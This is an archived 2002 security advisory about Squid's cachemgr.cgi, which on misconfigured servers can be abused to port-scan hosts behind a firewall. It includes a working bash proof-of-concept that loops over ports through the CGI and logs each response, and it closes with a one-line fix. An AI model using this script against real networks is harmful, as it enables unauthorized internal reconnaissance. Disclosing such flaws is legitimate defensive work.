Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: Apps :: web5065.htm

Squid - cachemgr.cgi shipped with Squid can be fooled to scan hosts besides firewalls



5th Feb 2002 [SBWID-5065]
COMMAND

	cachemgr.cgi shipped with Squid can be  fooled  to  scan  hosts  besides
	firewalls

SYSTEMS AFFECTED

	Tested on : Linux Redhat 6.2
		    Squid 2.3STABLE4

		    Apache 1.3.12

	

PROBLEM

	In Francisco Sáa Muñoz advisory [http://www.ip6seguridad.com] :
	

	Due to a  misconfiguration  on  Apache  and  Squid  Is  posible  to  use
	cachemgr.cgi shipped with  Squid  to  scan  hosts  under  the  corporate
	firewall.
	

	There is a lil\' script to demonstrate the  error,  not  so  clean,  but
	useful.
	

	

	--- Begin nasty code miscachemgr.cgi ---

	#!/bin/bash -x

	

	# Port scanning using a misconfigured squid

	# using open apache

	

	# Usage miscachemgr host_vuln host_to_scan end_port

	

	# Concept: Jacobo Van Leeuwen & Francisco Sáa Muñoz

	# Coded by Francisco Sáa Muñoz

	# IP6 [Logic Control]

	

	PORT=1

	ONE=\'/cgi-bin/cachemgr.cgi?host=\'

	TWO=\'&port=\'

	THREE=\'&user_name=&operation&auth=\'

	

	mkdir from_$1_to_$2

	

	while [ $PORT -lt $3 ]; do

	

	# lynx -dump http://$1/cgi-bin/cachemgr.cgi?host=\\

	# $2&port=$PORT&user_name=&operation=authenticate&auth= > \\

	# port_$1_to_$2/$PORT.log 2>&1

	

	lynx -dump http://$1$ONE$2$TWO$PORT$THREE > from_$1_to_$2/$PORT.log 2>&1

	let PORT=PORT+1

	

	done

	--- End nasty Code ---

	

	

SOLUTION

	Deny access to the cgi


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH